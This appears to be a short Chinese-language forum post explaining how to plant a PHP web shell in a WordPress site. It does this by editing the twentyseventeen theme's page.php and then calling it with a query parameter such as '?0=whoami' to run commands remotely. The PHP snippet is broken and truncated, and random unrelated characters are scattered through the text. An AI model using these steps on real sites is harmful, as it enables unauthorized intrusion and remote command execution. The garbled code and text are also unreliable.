按照我下面這個方式試試蚯涮,這是我經(jīng)常用的最簡單的方法,wordpress拿shell推捐,一般是在主題和插件上做文章,頁面上修改之后侧啼,具體路徑一般都是固定的牛柒,直接訪問即可,總體思路就是要么有權(quán)限直接在當前頁面代碼修改或者添加痊乾,要么能夠新建添加
登錄到目標WordPress程序找到路徑/wp-content/themes/twentyseventeen/page.php 當然還有其他寫webshell代碼的位置皮壁,只要有權(quán)限寫入即可,這里只是列舉其中之一哪审,寫入如下php代碼
if (isset(_GET[0]);
}
訪問 http://x.x.x.x..x/wp-content/themes/twentyseventeen/page.php?0=whoami 即可遠程執(zhí)行命令
可參考下面兩篇文章
https://www.cnblogs.com/ssw6/p/12668000.html
https://cloud.tencent.com/developer/news/378799